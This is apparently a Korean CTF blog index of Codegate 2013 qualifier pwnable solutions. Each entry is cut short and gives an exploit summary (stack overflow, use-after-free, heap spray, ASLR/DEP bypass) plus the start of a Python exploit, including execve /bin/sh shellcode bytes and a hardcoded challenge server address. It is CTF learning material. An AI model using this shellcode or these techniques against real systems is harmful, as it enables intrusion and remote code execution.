Category : Pwnables Summary : simple remote buffer overflow Exploit#!/usr/bin/python from socket import *from struct import pack HOST = "184.72.73.160"PORT = 33227 shellcode_loader= "\x33\xc0\x33\xd2\x31\xdb\x42\xc1\xe2\x08\x43\x43\x43\x43\x04\x03\x54\x59\x81\xc1\x10\xfe\xff\xff\xcd\x80\x3c\x02\x7e\x02\xff\xe1\x31\xc0\x40\x89\xc3\xcd\x80"# read(4, buf, 0x100) -> buf();SHELLCODE = "\x31\xdb\xf7\x..
CTF/2013
Category : Pwnables Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass Exploit#!/usr/bin/python import sysfrom struct import pack show= lambda : sys.stdout.write("1\n")add = lambda title, url: sys.stdout.write("2\n"+title+"\n"+url+"\n")modify= lambda num, title, url: sys.stdout.write("3\n"+"1\n"+num+"\n"+title+"\n"+url+"\n")delete = lambda num: sys.stdout.write("4\n"+"1\n"+n..
Category : Pwnables Summary : use-after-free, using uninitialized function pointer Exploit#!/usr/bin/python import sysfrom struct import pack write = lambda author, title, content: sys.stdout.write("1\n"+author+"\n"+title+"\n"+content+"\n")read = lambda idx: sys.stdout.write("2\n"+str(idx)+"\n") delete = lambda: sys.stdout.write("1\n")modify = lambda author, title: sys.stdout.write("2\n"+author+..
Category : Pwnables Summary : arbitrary memory overwrite, vtable Exploit#!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = ""payload += "-4\n"payload += "\xe4\x91\x04\x08"payload += "\xe8\x91\x04\x08"payload += "\x90"*0x3..
Category : Pwnables Summary : simple stack-based remote buffer overflow Exploit#!/usr/bin/python from socket import *from struct import pack p = lambda x : pack("
이번 2013년 Codegate 2013 CTF 예선전에 출제됬던 pwnable분야 문제들의 Exploit 및 Solution입니다. Vuln100 : Not yetVuln200 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-200Vuln300 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-300Vuln400 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-400Vuln500 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-500
